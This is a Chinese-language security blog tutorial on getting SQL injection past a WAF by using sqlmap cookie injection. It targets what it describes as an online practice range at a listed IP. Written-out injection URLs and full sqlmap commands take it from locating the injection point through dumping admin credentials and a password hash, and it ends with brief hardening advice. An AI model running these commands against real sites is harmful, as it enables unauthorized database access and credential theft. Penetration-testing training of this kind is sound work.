茴香豆安全 - Sql注入如何绕过WAF/IPS防火墙

一、前言

  • 前面我们学习了如何利用sqlmap工具sql注入,获取网站的管理员账号密码,看似流程非常简单,不过在实际渗透测试的时候,我们其实会遇到各种各样的问题。其中一种就是对方网站采用了WAF防火墙,或者有IPS入侵检测机制,做了一定的字符过滤,常规的SQL注入方法我们根本无法成功。
  • WAF是通过执行一系列针对HTTP/HTTPS的安全策略还专门为Web应用提供保护的一种 Web应用防火墙

二、相关工具准备

  • sqlmap,sql注入常用的工具
  • 在线靶场,用于sql注入测试的在线网站,我们这次使用 http://59.63.200.79:8004/

三、具体测试过程

1. 打开靶场网站,寻找注入点,先可以采用人工的方式初步做些简单的验证

  • 浏览器打开靶场网站,点击新闻,找到一个疑似注入点


    image.png
http://59.63.200.79:8004/shownews.asp?id=171
  • 到底怎么找注入点,说实话这个除非有相应的工具做全局的检测,其余的方法就是靠经验,靠人工先简单验证
  • 一般是一些详情页的url,比如上面这个新闻详情,我们随便修改id的值,如果内容跟着变化就很有可能是注入点
  • 然后我们在url后面拼接一些sql语句,来观察界面的变化
  • 我们尝试url后拼接sql语句,比如 order by 10,发现内容并无变化
http://59.63.200.79:8004/shownews.asp?id=171 order by 10
image.png
  • 我们再试试, order by 11,发现数据库报错了,基本可以确定这里存在注入点


    image.png
  • 通过上面的测试我们基本可以判断,当前新闻的表,他有10个字段,我们再试试有没有admin表
http://59.63.200.79:8004/shownews.asp?id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin

image.png
  • 弹出了错误提示,这个网站很有可能存在WAF防火墙,对一些sql字符进行了过滤,手动测试我们就到此为止了,至少我们可以判断这是个注入点,但是存在防火墙的过滤策略。

  • 我们用sqlmap执行下面的命令试试

sqlmap -u "http://59.63.200.79:8004/shownews.asp?id=171"
image.png
  • 的确存在某种WAF/IPS的防火墙保护,我们没法成功注入

2. 采用cookie注入的方式来绕过WAF

  • 执行下面的语句,进行cookie注入
sqlmap -u "http://59.63.200.79:8004/shownews.asp" --cookie "id=171" --level 2

注意后面要加上 --level 2 ,等级2或者2以上,才可以进行cookie的注入

image.png
  • 我们发现注入成功了,数据库类型是 Access
  • 其实到这里我们主要的目的已经达到了,下面就是按部就班的先猜解表,然后猜解字段,最后获取值,拿到管理员账号和密码。 不过之前我们说过 sqlmap对于asp和php的语法稍有不同,另外更主要的区别,对于php网站mysql数据库来说sqlmap的sql注入,更像是一种查询,速度很快;而对于asp网站access数据库才是真正的暴力猜解,速度慢,而且不一定能够猜解成功

3. 猜解表

  • 因为access类型的数据库,一个数据库就是一个文件,所以我们直接猜解表
sqlmap -u "http://59.63.200.79:8004/shownews.asp" --tables --cookie "id=171" --level 2
image.png

如图所示,三个红框的内容分别解释下

  1. 系统提示因为是ACCESS数据库,是没法直接获得表的数量和表的名字的
  2. 系统问是否要用一个共通表来进行表是否存在的检测,你可以理解为是一个类似字典的文件,里面存了各种的表名,可以用于表名的暴力拆解,选择默认的1就好
  3. 系统问要启用多少个线程,线程越多速度越快,我们输入10就行
image.png
  • 如图所示,我们这个表名字典里面有3348条数据,目前已经验证了272个,已经找了4个表,我们发现里面有个表叫admin,所以基本可以确定管理员账号就在里面,所以可以不用继续猜了,直接停止就行

4. 继续猜解字段

  • 执行下面的命令,参数我就不解释了,应该很容易理解
sqlmap -u "http://59.63.200.79:8004/shownews.asp" --columns -T admin --cookie "id=171" --level 2
image.png
  • 如图所示,我们发现这个admin表中有username 和password 字段,应该就是对应的用户名和密码。注意,因为暴力猜解非常耗时,所以一旦我们发现了我们所需要的关键字段,随时可以停止

5. 获取用户名和密码

  • 执行下面的命令,--colunms参数,表示猜解所有字段,-T 指定表
sqlmap -u "http://59.63.200.79:8004/shownews.asp" --dump -C username,password  -T admin --cookie "id=171" --level 2
image.png
  • 这样我们就拿到了账号admin和密码 b9a2a2b5dffb918c,这种密码很眼熟吧,找个MD5在线网站解密就会获得真实的密码,这里不再赘述了

五、最后

  • 本次测试,我们主要学习了采用sqlmap的cookie注入来绕过WAF的方法,然后就是理解了 php/mysql和asp/access sql注入的本质区别,前者其实是一种数据库查询,而后者其实是一种暴力破解

  • 根据以上的结论,如果我们的网站是asp/access的,为了增加安全性,应该考虑,不要使用常用的表名,增加暴力破解的难度,也不要使用简单的密码,增加解密的难度。

你可能感兴趣的:(茴香豆安全 - Sql注入如何绕过WAF/IPS防火墙)